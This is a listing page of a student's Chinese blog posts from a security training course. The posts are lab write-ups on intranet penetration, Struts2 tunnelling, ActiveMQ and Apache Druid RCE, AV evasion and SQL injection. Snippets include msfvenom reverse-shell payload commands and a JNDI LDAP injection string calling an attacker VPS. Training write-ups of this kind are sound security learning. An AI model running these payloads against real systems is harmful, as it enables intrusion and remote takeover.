- 博客(10)
- 收藏
- 关注
原创 在阿一网络安全学院练习红日靶场之通过MSF和CS上线PC机器
直接去目标机器执行了一下木马,是可以上线的,也许真实场景可以想办法的钓鱼让目标主动点击。若目标机器无法出网,就得让同处于内网的跳板机,采取正向或者反向连接的方式进行上线了。已知开放了这些端口,且我们拥有域控密码信息,尝试另外一种上线方式,让跳板机。可以直接在跳板机上新建监听,然后转发上线,但生成的木马免杀有点难操作。没有拿下,这台机器开了防火墙,直接通过。进行内网信息收集,得知域控机器。,并设置定时任务运行,从而上线。进程上,无法成功,遂找了个。,但这样操作的前提是建立在。通过之前抓取的密码,建立。
2024-06-11 11:42:58
265
原创 在阿一网络安全学院学习2个月实战内网渗透练习之拿下Win7
use auxiliary/scanner/db2/db2_version #探测内⽹的db2服务,基于默认的50000端⼝。use auxiliary/scanner/http/http_version #发现内⽹http服务,基于默认80端⼝。use auxiliary/scanner/smb/smb_version #发现内⽹smb服务,基于默认的445端⼝。use auxiliary/scanner/rdp/rdp_scanner #发现内⽹RDP服务,基于默认3389端⼝。
2024-06-05 16:27:20
658
原创 阿一网络安全实战——利用Struts2搭建socks5隧道进内网
运行客户端以后,我们的服务端就可以看到已经建立完成了。运行(这个运行因为要加载配置文件,所以后面要加。在代理规则里面将我们需要代理的软件添加进去。同级目录下(之前传其他地方都运行不了)然后还是同样的先要赋予程序可执行权限。代理工具新建一个代理,设置为刚刚。对应的文件如下,接下来开始部署。路径,我们在该路径下上传一个。这两个文件赋予可执行权限。配置文件的具体内容如下。,并且该台机器可以出网。只扫出来开放了两个端口。用冰蝎上传至一开始上传。配置文件具体内容如下。然后运行的时候也要加载。
2024-05-29 16:38:35
335
原创 阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是。【命令解释】:调⽤java -jar 运⾏ jmet的jar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载。阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成。使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡。
2024-05-24 11:20:45
768
原创 阿一网络安全培训第60天——Apache Druid RCE漏洞复现及修复(CVE-2023-25194)
2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统,Kafka 可以处理⼤量的消息和数据流,具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar:监听,可反弹shell。的特点,⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞,可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个。
2024-05-24 11:12:27
622
原创 阿一网络安全培训学习第55天的一次真实环境下渗透的全过程
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f。msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f macho >msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
2024-05-20 14:24:04
837
原创 在阿一学习网络安全的第n天:免杀练习
将生成的测试文件导入virtest。等杀毒软件对生成的文件进行扫描。使用十六进制编辑器打开恶意软件。因此被杀毒软件检测为病毒。保存后使其暴露在杀软环境下。可勾选自动确定,防止手酸。将该单词进行修改即可。
2024-05-07 14:17:08
289
原创 在阿一网络安全培训学习第29天!课后作业之pikachu靶场
然后发现一样只显示账号密码错误没显示验证码错误说明验证码可以使用。先打开靶场随机输入账号密码以及正确的验证码登录进行抓包。随后我们发到repeater模块更改验证码试试。最后爆破出账号为admin 密码为123456。爆破出账号密码为admin 123456。与上述操作一样随便输入账号密码进行抓包。我们验证码随便写的账号密码输入正确。依旧登录成功说明我们绕过成功。发送到repeater模块。并没有显示验证码输入错误。在burp上进行同样操作。说明成功绕过验证码严重。我们在进行账号密码爆破。
2024-04-29 10:42:36
99
2
原创 在阿一网络安全培训学习的第20天!课后作业Burp靶场访问控制漏洞
位于conf下的application.properties中。值是固定死的然后使用该默认key可以构造JWT。登陆时进行抓包,替换返回包中的token值。该漏洞存在的原因是因为该版本nacos中,即使账号密码错误,也可登陆后台管理界面。将生成的身份令牌添加进去。
2024-04-25 10:48:32
161
2
原创 在阿一网络安全培训学习的第20天!课后作业—sqli-labs靶场练习
因此判断注入点再中Burp查看输入单引号,判断报错得知闭合为页面产生报错语句,因此直接进行报错查询查密码1个单引号报错两个单引号正常,由此判断闭合为该关卡注释符号被过滤了可以通过单引号闭合原语句的单引号,仍可进行查询输入得知查询字段数为,且回显字段数据输入1123得知查询字段数为,且回显字段数据输入11231。
2024-04-16 15:45:56
255
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人